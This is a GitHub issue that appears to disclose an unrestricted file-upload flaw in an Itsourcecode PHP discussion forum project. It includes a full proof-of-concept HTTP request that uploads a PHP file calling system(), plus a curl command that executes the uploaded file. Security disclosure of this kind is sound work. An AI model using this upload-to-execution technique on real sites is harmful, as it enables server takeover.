Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload #1

Closed
L1OudFd8cl09 opened this issue Jun 3, 2024 · 0 comments
Closed

Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload #1

L1OudFd8cl09 opened this issue Jun 3, 2024 · 0 comments

Comments

@L1OudFd8cl09
Copy link
Owner

Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Online Discussion Forum Project in PHP with Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • N3xu5Cr4ck37

Vulnerable File

  • change_profile_picture.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

  • In line 13 of the change_profile_picture.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows:

1

Impact

  • Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE

DESCRIPTION

  • The file upload operation was triggered on line 13 of the "change_profile_picture.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).

Vulnerability details and POC

POST /members/update_profile_picture.php HTTP/1.1
Host: 192.168.210.199:1218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10405231092695549021896513402
Content-Length: 260
Origin: http://192.168.210.199:1218
Connection: close
Referer: http://192.168.210.199:1218/members/change_profile_picture_modal.php?id=65
Upgrade-Insecure-Requests: 1
Priority: u=1

-----------------------------10405231092695549021896513402
Content-Disposition: form-data; name="image"; filename="123.php"
Content-Type: application/octet-stream

<?php system("ipconfig"); ?>
-----------------------------10405231092695549021896513402--

2

I successfully executed the PHP script on the terminal

 curl http://192.168.210.199:1218/uploads/123.php

3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@L1OudFd8cl09